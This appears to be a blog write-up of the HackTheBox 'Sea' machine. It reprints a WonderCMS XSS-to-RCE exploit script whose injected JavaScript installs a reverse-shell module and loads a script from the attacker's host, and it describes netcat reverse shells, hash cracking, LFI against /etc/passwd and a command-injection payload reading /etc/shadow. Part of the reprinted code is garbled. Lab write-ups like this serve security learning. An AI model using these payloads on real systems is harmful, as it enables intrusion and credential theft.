Sea HTB writeup

Walkethrough for the Sea HTB machine.

Posted by xtromera on August 23, 2024 · 12 mins read

Initial Recon

Beginning with a default nmap scan nmap scan
Found ports 22 (SSH) and 80 (HTTP). I decided there was no need to perform service scanning.

Meanwhile, I started the usual directory brute forcing in the background.

└─$ gobuster dir -u=http://$ip -w=/usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt

Found some interesting entries directories bruteforcing

Further enumerating each directory found we get:

  1. Plugins plugins
  2. themes themes
  3. data data
  4. home home

The only interesting finding here in my opinion is the themes/bike and the data/files so lets check them both

  1. /themes/bike themes_bike
  2. /data/files:nothing interesting

For /themes/bike/version we get 3.2.0 bike_version
looking at the scans we got from bike, it seems to be like a github repo so trying and get a hit!! readme
WonderCMS Version 3.2.0
Checking for vulnerabilities, found this link so cloned the repo just in case we need it repo_cloning
Time to access the webpage :)) at least now we know what we will be facing index
Clicking on how to participate button how_to_participate
We get a hyperlink on contact, clicking on it we get a redirection to sea.htb/contact.php time to edit some hosts files :))
After correctly loading the page, we get a very interesting finding contact_page
This leads to pretty much a lot of attacks vectors.
First, trying some basic XSS xss_trial
we get some ‘front end’ input sanitization so firing up burpsuite foxyproxy
Catching the request from the proxy tab requ_proxy
This is the URL encoding of our request sent earlier
will send it to the ‘Repeater’ and try some XSS payloads repeater
No input sanitization on backend input_sanitization
No reflection so cannot use 90% of XSS payloads
Trying to steal cookie as this form is getting submitted and maybe checked by a higher authority cookie_steal
but before firing up I had to open a server server
Waited for more than 10 minutes but got nothing. Tried to change payload and do tricks for escaping but got nothing.
Checking the exploit we cloned earlier

  # Author: prodigiousMind
# Exploit: Wondercms 4.3.2 XSS to RCE

import sys
import requests
import os
import bs4

if (len(sys.argv)<4): print("usage: python3 loginURL IP_Address Port\nexample: python3 http://localhost/wondercms/loginURL 5252")
  data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
 url = url.slice(0, -1);
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname; 
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;"GET", urlRev);
xhr3.onload = function() {
 if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;"GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
   xhr4.onload = function() {
     if (xhr4.status == 200) {
       var ip = "'''+str(sys.argv[2])+'''";
       var port = "'''+str(sys.argv[3])+'''";
       var xhr5 = new XMLHttpRequest();
       xhr5.withCredentials = true;"GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
    print("[+] xss.js is created")
    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
    XSSlink = XSSlink.strip(" ")
    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)

    print("\nstarting HTTP server to allow the access to xss.js")
    os.system("python3 -m http.server\n")
  except: print(data,"\n","//write this to a file")

As we can see, it has a usage of python3 loginURL IP_Address Port
the logiURL is being sanitized
a module is getting fetched from the internet
a page is being created at /themes/revshell-main/rev.php with parameters lhost and lport
What we will do is to change some things in the script
The modules needs to be installed as HTB machines cannot access the internet and then fetch it from our local machine
We will first try to run the expoit without changing anything and see if it is working exploit_check
Now open a netcat listener and send this link to the contact form website entry and wait
we get a reply from the server finally netcat
now accessing this url with those specific parameters to catch a reverse shell on my listener


Upgrading the shell and spawning a real TTY shell tty_shell
Found database.js in /var/www/sea/data where a hash could be identified database
This seems to be a valid hash but something was odd, \\ are present to escape the / so had to remove them and pass it to hashid hashid

a Blowfish hash was identified
cracking with mode 3200 hashcat
Found a valid password mychemicalromance
password spraying on the current users including root users
valid credentials found amay:mychemicalromance
SSH to get a better foothold ssh
Beginning with the privilege escalation checklist
Starting with sudo permissions sudo_check
Checking for internal ports and running services ports
Got 2 interesting ports 59691 and 8080
curling both ports got us 2 different responses curl

  1. 8080: Unauthorized access which is making me curious
  2. 59691: No response at all so will just leave it and will get to it later if no attack vector was found
    Achieving local port forwarding using ssh localPort
    Accessing the internal service on our localhost:4444 address
    We get a login form, entering Amay credentials amay
    We are welcomed with the index page local_index
    Clicking on analyze access.log accessLog
    seems to be an LFI potential vulnerability
    We get a weird message at the end weird
    Intercepting the request with burpsuite burp
    Sending to the repeater to begin playing with the Packet repeaterAgain
    Changing the parameter to /etc/passwd etcpasswd
    We get some of the /etc/passwd file someetc
    and the weird sentence….
    Checking the permissions on the access.log file we get permission denied so Trying to check the permissions on the whole directory perm
    It seems that this process is running as root
  3. Service running as root and has permissions to read all the files on the file system
  4. It can check the content of the files and compare it to a sort of regex and then print out the suspicious pattern sentence
  5. A process may be running on the machine that takes the data given from the application, run a specific command on the server and return the output to the application displaying it After doing those analysis, tried to check for background running processes using ‘pspy64’ but got nothing (some protections are on place)
    Trying some command injection payloads
    Running this payload commandinjection
    analyzing the response response
    The whole /etc/passwd file is not printed out but still with the malicious pattern sentence at the end
    Running /etc/shadow;id shadow We get the hash of the root user and compromising the machine